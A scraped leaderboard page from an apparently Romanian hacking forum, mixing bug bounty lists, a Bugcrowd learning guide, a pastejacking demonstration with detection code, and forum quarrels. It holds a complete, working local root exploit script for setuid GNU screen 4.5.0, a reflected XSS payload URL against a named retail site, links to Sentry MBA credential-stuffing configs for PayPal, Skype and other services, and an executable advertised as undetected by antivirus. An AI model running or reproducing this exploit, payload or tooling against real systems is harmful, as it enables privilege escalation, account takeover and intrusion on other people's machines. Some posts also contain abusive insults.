Leaderboard

Popular Content

Showing content with the highest reputation on 01/28/17 in all areas

  1. Documentary thriller about warfare in a world without rules - the world of cyberwar. It tells the story of Stuxnet, self-replicating computer malware, known as a 'worm' for its ability to burrow from computer to computer on its own. In a covert operation, the American and Israeli intelligence agencies allegedly unleashed Stuxnet to destroy a key part of an Iranian nuclear facility. Ultimately the 'worm' spread beyond its intended target. Zero Day is the most comprehensive account to date of how a clandestine mission opened forever the Pandora's box of cyber warfare. A cautionary tale of technology, politics, unintended consequences, morality, and the dangers of secrecy. Link: http://www.bbc.co.uk/iplayer/episode/b08bcc18/storyville-zero-days-nuclear-cyber-sabotage Download: https://katcr.co/new/torrents-details.php?id=17952
    2 points
  2. Most of the time when we see a code snippet online to do something, we often blindly copy paste it to the terminal. Even the tech-savvy ones just see it on the website before copy pasting. Here is why you shouldn't do this.

     You probably guessed it. There is some malicious code between ls and -lat that is hidden from the user.

     Malicious code's color is set to that of the background, its font size is set to 0, it is moved away from rest of the code and it is made un-selectable (that blue color thing doesn't reveal it); to make sure that it works in all possible OSes, browsers and screen sizes.

         .malicious {
           color: #f3f5f6;   /* set it to that of the page */
           font-size: 0px;   /* make it small */
           /* move it out of the way */
           position: absolute;
           left: -100px;
           top: -100px;
           height: 0px;
           z-index: -100;
           display: inline-block;
           /* make it un-selectable */
           -webkit-touch-callout: none;
           -webkit-user-select: none;
           -khtml-user-select: none;
           -moz-user-select: none;
           -ms-user-select: none;
           user-select: none;
         }

         <span>ls</span>
         <span class="malicious">
           ; clear; echo 'Haha! You gave me access to your computer with sudo!';
           echo -ne 'h4cking ## (10%)\r'; sleep 0.3;
           echo -ne 'h4cking ### (20%)\r'; sleep 0.3;
           echo -ne 'h4cking ##### (33%)\r'; sleep 0.3;
           echo -ne 'h4cking ####### (40%)\r'; sleep 0.3;
           echo -ne 'h4cking ########## (50%)\r'; sleep 0.3;
           echo -ne 'h4cking ############# (66%)\r'; sleep 0.3;
           echo -ne 'h4cking ##################### (99%)\r'; sleep 0.3;
           echo -ne 'h4cking ####################### (100%)\r';
           echo -ne '\n';
           echo 'Hacking complete.';
           echo 'Use GUI interface using visual basic to track my IP'<br>
           ls
         </span>
         <span>-lat </span>

     This can be worse. If the code snippet had a command with sudo for instance, the malicious code will have sudo access too. Or, it can silently install a keylogger on your machine; possibilities are endless. So, the lesson here is, make sure that you paste code snippets from untrusted sources onto a text editor before executing it.

     Source, and the place where the command appears as it should be copied if you want to try it.
    2 points
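
A defender-side check for the trick described in the post above, as an added example that is not part of the original post: it separates the text a reader sees from the text concealed by the CSS traits the post lists, and reports whether the concealed part carries a line break. The function names, the pattern list and the sample markup are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# The concealment traits the post lists: zero font size, off-screen offset,
# zero height, unselectable text. Background-matched colour is not checked.
HIDING = [re.compile(p, re.I) for p in (
    r"font-size\s*:\s*0(?![.\d])",
    r"(?<![\w-])(left|top)\s*:\s*-\d",
    r"(?<![\w-])height\s*:\s*0(?![.\d])",
    r"user-select\s*:\s*none",
)]
VOID = {"br", "hr", "img", "input", "meta", "link", "wbr"}

def is_hiding(declarations):
    return any(p.search(declarations) for p in HIDING)

def hidden_classes(css):
    """Class names whose rule body contains a concealment declaration."""
    return {m.group(1) for m in re.finditer(r"\.([\w-]+)\s*\{([^}]*)\}", css)
            if is_hiding(m.group(2))}

class CopyAudit(HTMLParser):
    """Splits a snippet's text into what the reader sees and what is concealed."""
    def __init__(self, hidden):
        super().__init__()
        self.hidden = hidden
        self.stack = []                      # per open element: inside a hidden subtree?
        self.seen, self.concealed = [], []

    def _inside(self):
        return bool(self.stack and self.stack[-1])

    def _emit(self, text):
        (self.concealed if self._inside() else self.seen).append(text)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        here = bool(self.hidden & set((a.get("class") or "").split()))
        here = here or is_hiding(a.get("style") or "")
        if tag == "br":
            self._emit("\n")                 # a copied <br> pastes as a newline
        if tag not in VOID:
            self.stack.append(here or self._inside())

    def handle_endtag(self, tag):
        if tag not in VOID and self.stack:
            self.stack.pop()

    def handle_data(self, data):
        self._emit(data)

def audit(html, css=""):
    parser = CopyAudit(hidden_classes(css))
    parser.feed(html)
    parser.close()
    squash = lambda parts: " ".join("".join(parts).split())
    return {"seen": squash(parser.seen),
            "concealed": squash(parser.concealed),
            "suspicious": bool(squash(parser.concealed)),
            "runs_on_paste": "\n" in "".join(parser.concealed)}

# Constructed sample modelled on the post's markup, with a harmless payload.
SAMPLE_CSS = ".malicious { font-size: 0px; position: absolute; left: -100px; user-select: none; }"
SAMPLE_HTML = ('<span>ls</span> <span class="malicious">; echo hidden command ran<br>'
               'ls </span> <span>-lat</span>')

if __name__ == "__main__":
    print(audit(SAMPLE_HTML, SAMPLE_CSS))
```
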
  3. We will maintain here a list of sites that have a bug bounty program.

     Google http://www.google.com/about/appsecurity/reward-program/
     Facebook https://www.facebook.com/whitehat/bounty
     Mozilla http://www.mozilla.org/security/bug-bounty.html
     Paypal https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues
     Secunia http://secunia.com/community/research/svcrp/
     Etsy http://codeascraft.etsy.com/2012/09/11/announcing-the-etsy-security-bug-bounty-program/
     Barracuda http://www.barracudalabs.com/bugbounty/
     ----------------------------------------------------------------------------------------------
     Sites that will acknowledge the people who report vulnerabilities to them:

     Adobe http://www.adobe.com/support/security/alertus.html
     Twitter https://twitter.com/about/security
     EBay http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html
     Microsoft http://technet.microsoft.com/en-us/security/ff852094.aspx
     Apple http://support.apple.com/kb/HT1318
     Dropbox https://www.dropbox.com/security
     Reddit http://code.reddit.com/wiki/help/whitehat
     Github https://help.github.com/articles/responsible-disclosure-of-security-vulnerabilities
     Ifixit http://www.ifixit.com/Info/responsible_disclosure
     37 Signals http://37signals.com/security-response
     Twilio http://www.twilio.com/blog/2012/03/reporting-security-vulnerabilities.html
     Constant Contact http://www.constantcontact.com/about-constant-contact/security/report-vulnerability.jsp
     Engine Yard http://www.engineyard.com/legal/responsible-disclosure-policy
     Lastpass https://lastpass.com/support_security.php
     RedHat https://access.redhat.com/knowledge/articles/66234
     Acquia https://www.acquia.com/how-report-security-issue
     Zynga http://company.zynga.com/security/whitehats
     Owncloud http://owncloud.org/security/policy
     Tuenti http://corporate.tuenti.com/en/dev/hall-of-fame
     Soundcloud http://help.soundcloud.com/customer/portal/articles/439715-responsible-disclosure
     Nokia Siemens Networks http://www.nokiasiemensnetworks.com/about-us/responsible-disclosure
     Yandex Bug Bounty http://company.yandex.com/security/hall-of-fame.xml

     Original list: List of Bug Bounty program for PenTesters and Ethical Hackers - E Hacker News

     The list is being updated. If you have something to add, post in this topic and we will update it here too.
    1 point
  4. Furk.net is your personal secure storage that fetches media files and lets you stream them immediately. You can use it to stream video or listen to your music from PC, smartphone, HTPC or even a game console (XBOX, PS3). Service limits: Bandwidth limit: up to 250GB per month. Disk storage limit: unlimited (as long as files are from public sources). Invite key: M2LYNJEKR N6PYUOECT E9OL6IWB9 1S91EF5X2 1KASOFR8I 2GQV8R5UN Whoever uses a key, please let us know.
    1 point
  5. Al Salamu alaykom. All of you know Sentry MBA; for those who don't know it, it's software used to perform brute force attacks (accounts, websites ...). I will not talk so much about the usage of Sentry MBA (like I said in the title, it's just for configs), but if you are interested in Sentry MBA you can read this article on my blog. Read the article. Now for the configs: SKYPE CONFIG : DOWNLOAD BANGBROS CONFIG : DOWNLOAD PAYPAL CONFIG : DOWNLOAD BRAZZERS CONFIG : DOWNLOAD MOFOS ELITE CONFIG : DOWNLOAD REALITY KINGS CONFIG : DOWNLOAD LIVE JASMINE CONFIG : DOWNLOAD UPLOADED.TO CONFIG : DOWNLOAD ORIGIN CONFIG : DOWNLOAD IMLIVE CONFIG : DOWNLOAD NETLOAD CONFIG : DOWNLOAD RAPID GATOR CONFIG : DOWNLOAD PORNHUB CONFIG : DOWNLOAD EARTH VPN CONFIG : DOWNLOAD LOL CONFIG : DOWNLOAD MEDIAFIRE CONFIG : DOWNLOAD HMA CONFIG : DOWNLOAD CAM4 CONFIG : DOWNLOAD Good bye :">
    1 point
  6. You say yourself that "I said it takes 1h", which I stand by, yet right after the payment, not even 10 minutes later, you posted the topic, and of (that 1 hour) there was still time left to wait because it had not passed. I understand you, you are frustrated, you wanted to scam me, and you prove it with the image of your btc wallet in which you no longer had even $1. I understand that you did not manage to find out what is bothering you, and you will not find out either, because I will let her know with a message on Facebook, possibly one by e-mail too, so that it is your problem ...
    1 point
  7. I'm telling you that you're a loser, you posted in the wrong category. You don't even read your own topic.
    1 point
  8. So it seems you are contradicting yourself. You are the one asking why I stopped replying when you said you had sent a part, and you are also the one saying that I said I would get back in 1h. As for swearing, I don't know who is swearing, because I don't see any swearing; if you feel frustrated that you lost something, that's your business. Don't worry, I'm not afraid that you posted here, as long as I come with logs! As it turns out, look, you are the one who keeps sending messages on RST! Do you want me to find and post that one too, where I tell you that I have some work to do ("that's why I'm not replying") and that I will send you back the reply with everything? Or will you admit it yourself?
    1 point
  9. Hey, you asshole, first of all you are the one starving, not me. Second, if you got yourself ripped off on other forums, that's your business. Third, you live as if it were the mIRC era: "done" "I did it" "come on, paste it" ... "aaa" "there, you scammed me". To show everyone else: compared to you, I have a good reputation here on the forum, I have seniority compared to you, and I don't stoop to scamming for 40 euros as you think. As proof, below are 4 screenshots of me giving you the money back, and we are not continuing even for 500 euros, because you are a stupid kid. On top of that, I want to point out that from the moment the money was transferred until this topic was posted no more than 10 minutes passed, during which I told him I still had work to do. If needed, I can post the whole conversation with him, which in any case did not take place in RST private messages but only mail to mail, but I will do it to be more convincing! On top of that, I now see from this "Edit" that, as you yourself say, another part of 40 euros was still to be transferred? And your btc account has a balance of $0? Where was the other 40 supposed to come from? " I ask an admin to make a decision, and if they consider that I deserve a warn I gladly accept it, because I reply to all the stupid kids on the forum. Thank you
    1 point
  10. 1 point
  11. #!/bin/bash # screenroot.sh # setuid screen v4.5.0 local root exploit # abuses ld.so.preload overwriting to get root. # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html # HACK THE PLANET # ~ infodox (25/1/2017) echo "~ gnu/screenroot ~" echo "[+] First, we create our shell and library..." cat << EOF > /tmp/libhax.c #include <stdio.h> #include <sys/types.h> #include <unistd.h> __attribute__ ((__constructor__)) void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n"); } EOF gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c rm -f /tmp/libhax.c cat << EOF > /tmp/rootshell.c #include <stdio.h> int main(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh", NULL, NULL); } EOF gcc -o /tmp/rootshell /tmp/rootshell.c rm -f /tmp/rootshell.c echo "[+] Now we create our /etc/ld.so.preload file..." cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed echo "[+] Triggering..." screen -ls # screen itself is setuid, so... /tmp/rootshell
    1 point
  12. @FaNelutu, man, it's been about two years since anyone spoke in this topic. Whoever opened it has probably died in the meantime :))) Electrocuted.
    1 point
  13. AGSQ: Mai dute ma in pula mea de tigan mustacios cu tot cu SRL-ul pulei mele de 200 de lei capital social si sediu social in pizda pe campuri unde nu aveti nici canalizare. Tu compari o corporatie cu cacatul tau de SRL si 400 euro incasari lunare? Cum adica server reutilizat? Tu dupa ce foloseste clientul o luna serverul, il arunci ? Pai ce flocii lu ma-ta grasa, serverul e prezervativ ? Besi in pula mea de ratat cu aberatiile si comparatiile tale de doi lei.
    1 point
  14. PRIVATE BUGBOUNTY. I RECEIVED 2 VPS AND 1 DOMAIN FOR 1 YEAR. STATUS: FIXED
    1 point
  15. Step 1) Start reading!

      There are some go-to books that you can buy to help you learn the basics and essentials of penetration testing and bug hunting. Since bug bounties often include website targets, we’ll focus on getting you started with Web Hacking and later we’ll branch out.

      Note -> It's very important to focus on an area of hacking that is interesting & exciting to you. Focus on that one area and pick up new things as you go, but don’t try to be the “ultimate hacker” and learn everything. The greatest hackers on Bugcrowd have specialities and areas of interest, but they don’t know how to hack everything. Hacking is a lifelong journey of learning.

      Your two go-to books are the following:
      • The Web Application Hacker’s Handbook: This is an absolute must-read and considered the web-app hacker’s ‘bible’. This book starts from square one, walking you through getting Kali Linux installed all the way through using tools and finding exploits.
      • OWASP Testing Guide v4: Highly suggested by Bugcrowd’s Jason Haddix

      For further reading:
      • Penetration Testing
      • The Hacker Playbook 2: Practical Guide to Penetration Testing

      And for our Mobile hacking friends:
      • The Mobile Application Hacker’s Handbook
      • iOS Application Security

      Step 2) Practice what you’re learning!

      While you’re learning it’s important to make sure that you’re also understanding and retaining what you learn. Practicing on vulnerable applications and systems is a great way to test your skills in simulated environments. These will give you an idea of what you’ll run up against in the real world.
      • Hacksplaining: This is a great site to learn a bit more about various web hacking techniques and how they’re done. It’s actually more of a practical walk-through. Super useful!
      • Penetration Testing Practice Labs: This site has a massive list of practice apps and systems for several hacking scenarios. Use this list to find new testing labs and sites to practice your skills.

      Step 3) Read tech write-ups and POCs (Proof of Concepts) from other hackers and watch tutorials on YouTube!

      Now that you’ve got a baseline understanding of how to find and exploit security vulnerabilities, it’s time to start checking out what other hackers are finding in the wild. Luckily the security community is quite generous with sharing knowledge and we’ve collected a list of write-ups & tutorials:
      • Bug Bounty write-ups and POCs: Collection of bug reports from successful bug bounty hunters.
      • Bug Hunting Tutorials: Our collection of great tutorials from the Bugcrowd community and beyond.
      • /r/Netsec on Reddit: Netsec on Reddit is almost exclusively tech writeups and POCs from other researchers. A fantastic resource.
      • JackkTutorials on YouTube: Jackk has created many tutorials that walk you through CSRF, XSS, SQL Injection, Target Discovery and much more.
      • DEFCON Conference videos on YouTube: Watch all of the talks from DEFCON over the years. Very useful resource.
      • Hak5 on YouTube: Hak5 typically focuses on hardware hacking, but in addition to that they also have the ‘Metasploit Minute’ show, HakTip: NMap and much more.
      • Awesome-Infosec: This is a curated list of helpful security resources that covers many different topics and areas.

      Step 3-A) Gather your arsenal of tools

      Tools don’t make the hacker, but they’re certainly helpful! Bugcrowd has curated an extensive list of tools that you can add to your bag of tricks:
      • Bugcrowd Researcher Resources - Tools

      Step 4) Join the community!

      You’re joining a global community of over 29,000 hackers. Luckily many of these hackers are happy to share their knowledge with a fellow polite & curious researcher.
      • Follow White-Hat Hackers on Twitter: A list of bug bounty hunters that you should be following.
      • Join the #Bugcrowd IRC channel to talk to over 100 security researchers
      • Follow @Bugcrowd on Twitter to keep up with the latest infosec news
      • Join the Bugcrowd Forum for more resources & to chat with other researchers

      Step 5) Start learning about bug bounties

      Okay, now you’re at the point where it’s almost time to start hunting for bounties. But first, let’s learn how bug bounties work and how to get started, just to make sure we maximize our chances of success.
      • How to approach a target: Advice from other bug hunters that will help you find more success when approaching a bug bounty.
      • How to write a Great Vulnerability Report: This will walk you through how to write a great vulnerability report. The better your report, the higher chance you will get a bounty!
      • How to write a Proof of Concept: Proof of Concepts show the customer how your bug is exploited and that it works. This is crucial to being rewarded successfully.
      • How to Report a Bug: Our walkthrough for reporting a bug via the Bugcrowd platform.
      • Bug Bounty Disclosure Policy: These are the rules of the road. It’s very important that you understand the bounty program’s bounty brief and disclosure policy.
      • Read the Bounty Hunter's Methodology: This is a presentation that @jhaddix gave at DEFCON last year and it's a super useful look at how successful bounty hunters find bugs. Check out the Github and watch the video.
      • How To Shot Web - Jason Haddix's talk from DEFCON23

      Step 6) Get hacking!

      It’s time to start hacking! When you’re new and getting started, it’s probably best not to try hacking the most popular bug bounties out there. Trying to hack Tesla Motors, Facebook, Pinterest and others will likely end in frustration for beginners, as those companies are very popular and are more secure because they receive many bug reports.

      Go for the Kudos only programs

      Instead, focus on bug bounties that have likely been overlooked by others. These are often bug bounties that don’t pay rewards but instead offer kudos points on Bugcrowd. These ‘kudos points only’ programs are a fantastic way to get started with bug bounties and to show your skills to Bugcrowd. After you’ve submitted some valid bugs to Bugcrowd, even if they’re kudos rewards only, you will likely start receiving invites to private bounty programs. The private bounty programs are invitation only and restricted to a small number of people, which means less competition and a higher likelihood of successfully finding a bug.

      Step 7) Always Be Learning & Networking

      Like we mentioned earlier, hacking is a lifelong journey of learning. This is what makes this field so exciting! There are always new articles and presentations to learn from, interesting people to meet at conferences or local meetups, and new opportunities to pursue. Bug bounties are a fantastic way to enter the InfoSec community and build your career. Use bug bounties as a way to make extra money, improve your skills, meet new people, and even build out your resume. Remember, always act professional and treat people well. This is a small community and we like to take care of each other - you never know who you might meet!
    1 point
  16. http://estore.htc.com/tw/buy/zh-TW/shop/SearchDisplay?searchTerm=asd'- confirm(document.domain)-'&storeId=10001&catalogId=10001&langId=-7&pageSize =20&beginIndex=0&sType=SimpleSearch&resultCatEntryType=2&showResultsPa ge=true&searchSource=Q&pageView=
    1 point
  17. //removed File Info: File Name: Comradex.exe SHA1: 3b1db3487d662bcd5e126f2d9d1a9dd254e22fa0 MD5: d3d03405483104ddbce45540dddfd520 Date and Time: 6-02-13,01:48:54 File Size: 797888 Bytes Detection: 0 of 35 Detections: AVG Free Clean ArcaVir Clean Avast 5 Clean AntiVir (Avira) Clean BitDefender Clean VirusBuster Internet Security Clean Clam Antivirus Clean COMODO Internet Security Clean Dr.Web Clean eTrust-Vet Clean F-PROT Antivirus Clean F-Secure Internet Security Clean G Data Clean IKARUS Security Clean Kaspersky Antivirus Clean McAfee Clean MS Security Essentials Clean ESET NOD32 Clean Norman Clean Norton Antivirus Clean Panda Security Clean A-Squared Clean Quick Heal Antivirus Clean Solo Antivirus Clean Sophos Clean Trend Micro Internet Security Clean VBA32 Antivirus Clean Vexira Antivirus Clean Zoner AntiVirus Clean Ad-Aware Clean BullGuard Clean Immunet Anti like this post
    1 point